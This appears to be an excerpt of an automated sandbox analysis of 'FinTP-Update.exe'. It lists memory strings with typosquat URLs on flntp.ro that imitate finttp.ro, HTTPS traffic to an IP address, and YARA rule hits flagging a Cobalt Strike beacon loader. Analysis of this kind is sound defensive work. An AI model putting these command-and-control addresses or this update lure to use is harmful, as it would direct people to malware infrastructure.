          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlt
          Source: FinTP-Update.exe, 00000000.00000003.2313200724.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266186373.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2288264868.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335299936.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 
00000000.00000003.2357499921.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlv
          Source: FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlz1
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/ss/portallogin-gettask.html
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2243779777.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266293573.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313315862.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651458102.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403144196.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221645510.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491486119.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188050658.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403086446.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 
00000000.00000003.2897558123.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299179602.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720594519.0000017F36C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/
          Source: FinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313366127.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/.finttp.ro/de
          Source: FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/.finttp.ro/rss/portallogin-gettask.htmlr
          Source: FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/Mwxd
          Source: FinTP-Update.exe, 00000000.00000003.2170181010.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2243779777.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266293573.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313315862.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651458102.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221645510.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491486119.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188050658.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403086446.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299179602.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720594519.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3344304389.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 
00000000.00000003.2764950621.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/V
          Source: FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/ptography
          Source: FinTP-Update.exe, 00000000.00000003.2199556611.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2243689631.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3358210766.0000017F388E0000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.html
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 
00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.html&
          Source: FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.html)p
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlAwtd
          Source: FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlC
          Source: FinTP-Update.exe, 00000000.00000003.2170181010.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2243779777.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266293573.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313315862.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651458102.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221645510.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491486119.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188050658.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403086446.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299179602.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720594519.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3344304389.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 
00000000.00000003.2764950621.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlJ
          Source: FinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313366127.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlO~
          Source: FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlP
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlPt
          Source: FinTP-Update.exe, 00000000.00000003.2221796771.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlct
          Source: FinTP-Update.exe, 00000000.00000002.3358210766.0000017F388E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlder
          Source: FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlderPt
          Source: FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlg
          Source: FinTP-Update.exe, 00000000.00000003.2221796771.0000017F3890B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlk~
          Source: FinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlmt
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlmw
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlople
          Source: FinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlr
          Source: FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlr&)
          Source: FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlt
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlv
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 
00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlz1
          Source: unknown HTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49706 version: TLS 1.2

          System Summary

          Source: dump.pcap, type: PCAPMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: C:\Users\user\Desktop\FinTP-Update.exe Code function: 0_2_0000017F38ADA1AC NtFreeVirtualMemory,0_2_0000017F38ADA1AC
          Source: C:\Users\user\Desktop\FinTP-Update.exe Code function: 0_2_0000017F38ADA30C NtProtectVirtualMemory,0_2_0000017F38ADA30C
          Source: C:\Users\user\Desktop\FinTP-Update.exe Code function: 0_2_0000017F38AD9F44 NtAllocateVirtualMemory,0_2_0000017F38AD9F44
          Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
